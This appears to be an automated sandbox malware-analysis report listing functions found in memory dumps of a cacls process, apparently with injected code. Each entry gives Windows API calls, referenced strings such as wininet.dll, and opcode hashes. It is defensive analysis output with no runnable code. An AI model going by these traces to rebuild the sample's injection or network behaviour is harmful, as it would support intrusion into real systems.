Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 773feac4da1cf94cc9a9d6d5ab664da5ca9d2be6bacb40ab4cb52342ead821f1
Instruction ID: fe541b76cf718b741c8e8717f9d1e7dde3d4b8e2d826e2ae9b789db012ca2412
Opcode Fuzzy Hash: 773feac4da1cf94cc9a9d6d5ab664da5ca9d2be6bacb40ab4cb52342ead821f1
Instruction Fuzzy Hash: CB90023120148812E5107158C40474B000587D1381F59C411A5428658D869589917125

Function 02F82C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82C6A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0075c2032f0aa0ca3c60e7e5105885060902b2ee8db41f3fbbd21317d57b5de3
Instruction ID: b7cc1469ebd6718681c2d5853e209aab2647b0e8496895f8231fd4803bfea851
Opcode Fuzzy Hash: 0075c2032f0aa0ca3c60e7e5105885060902b2ee8db41f3fbbd21317d57b5de3
Instruction Fuzzy Hash: ED90023120140852E50071588404B47000587E1381F55C016A1128654D8615C9517525

Function 02F82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82DFA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8bfa8adf393998e7a2fe4c3ae4b6a584564683bed18507ef2cc642119a5971af
Instruction ID: d9adad21cd2a2b0640357f56779386a9e61f90b35537cf3d697565b1628afdfa
Opcode Fuzzy Hash: 8bfa8adf393998e7a2fe4c3ae4b6a584564683bed18507ef2cc642119a5971af
Instruction Fuzzy Hash: 3590023120140423E51171588504707000987D12C1F95C412A1428558D96568A52A125

Function 02F82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82DDA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
Instruction ID: cf8a82584ea20095192d8dbb446d445271d23390086302f5a58a82f7eeb96cb8
Opcode Fuzzy Hash: 75a676fa29ffb393331846423af217354c451d3fc21c53bdf8864f2c133c4b47
Instruction Fuzzy Hash: 9E900231242441626945B1588404507400697E12C1795C012A2418950C85269956D625

Function 02F82D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82D3A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
Instruction ID: 05160477800016ea69983d1e37eb331c1f1ecc487d159a8ee14fa83699d1e997
Opcode Fuzzy Hash: e125456d9f9c061bb35b25054a0880edcb75bad8fb4a1d15f6ebd5705d78f939
Instruction Fuzzy Hash: 6690023130140013E540715894186074005D7E2381F55D011E1418554CD91589565226

Function 02F82D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82D1A

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
Instruction ID: 83ad994df1d576fbcd889b4595168b13d055329363f72550c2c0aafc0b53e923
Opcode Fuzzy Hash: 24c107af05a89e0c8ba1ef72bde300c9cb871a159e8972e148679b026fb223e5
Instruction Fuzzy Hash: 1790023921340012E5807158940860B000587D2282F95D415A1019558CC91589695325

Function 02F835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F835CA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f3866d7d2d5adddc23304e41d23dc1c37c1f2959c8d028e1b4d278e550033cd
Instruction ID: 3dd327ad592b836d216c5a0fea452bc21d166b5b609cb5d8f1eaa59314ee2e0d
Opcode Fuzzy Hash: 8f3866d7d2d5adddc23304e41d23dc1c37c1f2959c8d028e1b4d278e550033cd
Instruction Fuzzy Hash: BD90023160550412E50071588514707100587D1281F65C411A1428568D87958A5165A6

Function 02F839B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F839BA

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f32eda923189980b889a70f7238b57048bcccece9d1b1423dc8337886c4d6d52
Instruction ID: 442e0bbd2a9bd7153e96e4fa749f54a922f86fb774f7ef52b3bcf2a97fe7f51c
Opcode Fuzzy Hash: f32eda923189980b889a70f7238b57048bcccece9d1b1423dc8337886c4d6d52
Instruction Fuzzy Hash: E390023124545112E550715C84046174005A7E1281F55C021A1818594D855589556225

Function 00643E10 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 108
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(000007D0), ref: 00643EEB

Strings

wininet.dll, xrefs: 00643E7E, 00643E8A
i:4, xrefs: 00643ECC
net.dll, xrefs: 00643EA7, 00643F36, 00643F16, 00643F22, 00643F42

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: i:4$net.dll$wininet.dll
API String ID: 3472027048-2634764057
Opcode ID: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
Instruction ID: 3eb1156df19b56274bbb97a3de19b539f3efec419da3b53c0f78e2b528f552bb
Opcode Fuzzy Hash: 9c19912619b969d4492f2daff6b2ffbad7a51720dc2e438e4577885ffa5e0c71
Instruction Fuzzy Hash: D9317EB1A00705BBC714DFA4D881FEBB7B9EB88710F00811DFA596B241C7B0AB40CBA5

Function 00630FFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 117
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00631117

Strings

t577G2K6, xrefs: 0063111E, 00631121
t577G2K6, xrefs: 0063110C, 00631116, 00631127

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: t577G2K6$t577G2K6
API String ID: 1836367815-2667467881
Opcode ID: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
Instruction ID: 03b24e00e52ce35b6f471428348d4d90d8d11822c355e0760b3e78dfbf654081
Opcode Fuzzy Hash: 0552f22b151b17f9e535a8ed6bb9008edb1782d23ebd6ebc5d6af9584400a9a1
Instruction Fuzzy Hash: 1831DF72A052D47B8B05DB75AC42DE9BBA9EF53394B1440ADED449F202D6368E038BD1

Function 00631097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00631117

Strings

t577G2K6, xrefs: 0063111E, 00631121
t577G2K6, xrefs: 0063110C, 00631116, 00631127

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: t577G2K6$t577G2K6
API String ID: 1836367815-2667467881
Opcode ID: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
Instruction ID: e826d161a4fedab468166bdbb76a24eb6b86f299b004a2671248a1e6dc5e1764
Opcode Fuzzy Hash: 225896aef3f5f2ded065938a9608066204f4b1233ee5aa046c5d70eacc74819f
Instruction Fuzzy Hash: 5B1129B1D0025C7EDB109BE48C82DEFBB7CEF023A4F008068FA44AB141E6345E068BE5

Function 006310A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(t577G2K6,00000111,00000000,00000000), ref: 00631117

Strings

t577G2K6, xrefs: 0063111E, 00631121
t577G2K6, xrefs: 0063110C, 00631116, 00631127

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: t577G2K6$t577G2K6
API String ID: 1836367815-2667467881
Opcode ID: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
Instruction ID: 1e98d700888df89c4e7c2dd121516d0685a930fad4e2df4926fd3756f352edbd
Opcode Fuzzy Hash: 0353cb2e23396fec2c33eb35837a01185db1fbe0d8a77d78faa4aa4f93364115
Instruction Fuzzy Hash: 6401C871D0025C7ADB119AE48C81DEFBB7CDF42694F008068FA04AB101E6345E0687F5

Function 0063F869 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0063F887
CoUninitialize.COMBASE ref: 0063F96E

Strings

@J7<, xrefs: 0063F89B

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
Instruction ID: cf8acfe1c2b4b055dba850730bd0d400a61f28fbec33cd65fd9efbc5f898f2c6
Opcode Fuzzy Hash: 257f969a4aa80e5bec027f51d7631632e6c2a67b49a4ff1dd47c9b0a68ac93b6
Instruction Fuzzy Hash: 9D3141B5A0060AAFDB00DFD8C8809EEB7BAFF88304F108559E515EB254D771EE45CBA0

Function 0063F870 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0063F887
CoUninitialize.COMBASE ref: 0063F96E

Strings

@J7<, xrefs: 0063F89B

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
Instruction ID: 2ed26ad169d229d62249c084f1aecb3cc78edd8b71f6bcd196da5ec45fed696e
Opcode Fuzzy Hash: 58fcf34726c1358f6274ab2e4884b5cd5ecb42eb9839d8182d394bc5e53a52cd
Instruction Fuzzy Hash: AC312FB5A0060AAFDB00DFD8D8809EEB7BAFF88304F108559E515AB254D775EE058BA0

Function 006384EA Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00632040,0064834F,00645A0E,00632006), ref: 006384E3

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
Instruction ID: 8bc8f75905d61f6e9ae2f0a22fe0086fb4511a221574e1fbbbbdb8feba8361b3
Opcode Fuzzy Hash: 4e02e0d7e3b3a53fe3a078bdd5fcac6e3ec5e91085e971d8e4e24b2f4b3ac688
Instruction Fuzzy Hash: D711CA719103057FEB50EBE4DC46FEA73B9DB55360F00419CFD089B282EA74AA548795

Function 00634890 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00634902

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
Instruction ID: 9340cdd899801a3efaf0891d71bd679091e18b32f166de36e982bd247df7013d
Opcode Fuzzy Hash: 2afde102f9fe6f510f505a2d4b696e440cfae529a922d3c4672bbfa4d12d4071
Instruction Fuzzy Hash: 3A011EB5D4020DABDF50EAE4DC42FDEB7B99B54308F0041A9E90897241FA31FB18CB95

Function 00649C70 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,0063867E,00000010,?,?,?,00000044,?,00000010,0063867E,?,?,?), ref: 00649CD0

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
Instruction ID: c05583190ee0e1651d13a2a19bd51aa95439edc768b6fc359b7fce120e1610cd
Opcode Fuzzy Hash: 53127c51fb8e915e2ada1bd4b1e5bd03c96a5b42473f202cca94c82170286ba0
Instruction Fuzzy Hash: F801C0B2214208BBCB44DF99DC81EDB77AEAF8D714F108208BA09A7241D630F851CBA4

Function 00634958 Relevance: 1.5, APIs: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00634902

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
Instruction ID: 67af2d677198749b611bc9226b5f66e2cb25a73775dad59ea9ab3c1b0ae632ce
Opcode Fuzzy Hash: 3ecf082fedf959eed90aedf2510164954cb22344a25520f17983f10a877f4610
Instruction Fuzzy Hash: 72F02831E842098FDB00CFE8DC86BD9B3B0FB56719F140AD9DA098B241E6626596CB85

Function 00629DF0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00629E35

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
Instruction ID: 695d3e7f57b01afaba22be5184b780733a4a46a01eaa54aec0533a3faaf58dde
Opcode Fuzzy Hash: 8abc526603ee69cc07ae379c75a4a6867cf3df2a5e9c00712d5c962cde03cd73
Instruction Fuzzy Hash: 43F0653338071436D36161E9AC03FDB728D8F817B1F14002AFB4CDA2C5D595B90186A9

Function 00629DEC Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00629E35

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
Instruction ID: ce3dac51cafb9e8d1cc70960e11ef395d8dd9bd2be01e9a10698f0215299ec1e
Opcode Fuzzy Hash: c6d51795fe5fb80f5b7edaeae963119bc0c18f6b7ddc29b8439bdab75854f7f8
Instruction Fuzzy Hash: E2F09B3234075036D37166A59C43FEB675E8F91750F14001DF74DEB2C5CAA5B945C7A8

Function 006384A7 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00632040,0064834F,00645A0E,00632006), ref: 006384E3

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
Instruction ID: ef3cc2909ff593abff8fc59691bd2dfb818e5c97dd2ae58652ac476053ccf307
Opcode Fuzzy Hash: a7eb58f124f42faa32bd0b98e24c9cc65d6b44fed8b2e29aa4dd18ffd073b925
Instruction Fuzzy Hash: 0AE092362403057BF710DBA0DC47F96729ECB42791F0441A8FD08DB682EA25A72096E5

Function 00649BE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,03D00305,00000007,00000000,00000004,00000000,00634101,000000F4), ref: 00649C1F

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
Instruction ID: 9c27505bd360a88787c854d748d73a22c14598dc6812c4c3700085aacd8c6634
Opcode Fuzzy Hash: 75f02b597de3cd126b2fc3062aff01064d508103aae48e6dc2a1c99785baf08f
Instruction Fuzzy Hash: 26E092712002047BD610EE99DC41FEB33ADEFC5710F004009F908AB241CA70B951CBB9

Function 00649B90 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00631D39,?,006462C8,00631D39,00645A0E,006462C8,?,00631D39,00645A0E,00001000,?,?,?), ref: 00649BCC

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
Instruction ID: 5f0746dbad3a658639d707b0a35e6508a0f997e23f8cfb46696c4fb936367688
Opcode Fuzzy Hash: 74368963601848dfb3932e514e7ed159cc0ff9022fa56ce1313e14f5d7574f60
Instruction Fuzzy Hash: DEE06D722046087BD654EE58DC41FDB33ADDFC9710F004409F909A7241CA70B951CBF8

Function 006386B9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 006386EC

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
Instruction ID: a3b5a92d6e6ce0f90faa7bf44e450496db21bbfcb9b8a169d09925b1b632fc36
Opcode Fuzzy Hash: 2753a7d038357cc6f3c72076476afa14903284bd2399edb8ffc59166543d03fa
Instruction Fuzzy Hash: 9BE0DF712003042FEB24AA6CCC52FEA339A5B0A724F544654B958DF7D6DE38FA424298

Function 006386C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 006386EC

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
Instruction ID: e9ce5e509ec686986eb882e880eb62098f9ff12d7b13e66c196f5375b12a72b2
Opcode Fuzzy Hash: 15a8c1fbe4661d092a7777f04f65c76b4a3f90efd20042f133fff81cd82b29ad
Instruction Fuzzy Hash: CBE0DF312003042BEB246AA8DC42FEA338D9B49724F480660B95CCF2D2EA38FA024198

Function 006384B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00632040,0064834F,00645A0E,00632006), ref: 006384E3

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
Instruction ID: 3df0d3158fa89dbbf3081fa9ec04f22caaf8322e10cad5b97324cb589f1da689
Opcode Fuzzy Hash: 8dc3f67186c01a883a3194ad24f845b709415d137cd0f8e88734256b74fde265
Instruction Fuzzy Hash: 3AD05E723403053FF650E6E4DC03F5632CE4B06790F054068BE48DB6C2E964F60046A9

Function 02F82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02F82C24

Memory Dump Source

Source File: 00000006.00000002.2557235760.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000006.00000002.2557235760.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2557235760.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2f10000_cacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c72944faf7503b30ee4be7859a003eddc133f08334fdb38221f51b5a5e2edad1
Instruction ID: b52e874e034fe90f5c7ae3873f321509c760a8f5e4831753ef61dbb734acb4fc
Opcode Fuzzy Hash: c72944faf7503b30ee4be7859a003eddc133f08334fdb38221f51b5a5e2edad1
Instruction Fuzzy Hash: 75B09B71D015C5D5EE11F7604A08717790067D1791F15C061D3034645E4738D1D1E175

Non-executed Functions

Function 00629E46 Relevance: 22.6, Strings: 18, Instructions: 105COMMON

Download Yara Rule

Strings

8n, xrefs: 0062A094
"n, xrefs: 0062A075
x`, xrefs: 0062A039
=G, xrefs: 0062A08D
Yu, xrefs: 0062A04D
,, xrefs: 00629F0A
p, xrefs: 0062A09B
)t, xrefs: 0062A0A2
@, xrefs: 00629EF6
jJ, xrefs: 0062A000
Pq, xrefs: 00629F88
~, xrefs: 00629FEC
/a, xrefs: 00629FF6
q, xrefs: 0062A014
B`, xrefs: 00629FBC
us, xrefs: 0062A061
z`, xrefs: 00629FD1
Z4, xrefs: 00629F45

Memory Dump Source

Source File: 00000006.00000002.2553471608.0000000000620000.00000040.80000000.00040000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_cacls.jbxd

Yara matches

Similarity

API ID:
String ID: "n$)t$,$/a$8n$=G$@$B`$Pq$Yu$Z4$jJ$p$us$x`$z`$q$~
API String ID: 0-2356214696
Opcode ID: c875c6ec67383d0d29adbdb32ef9365de5f47e6b0581c40d81612fe4a3a91e5d
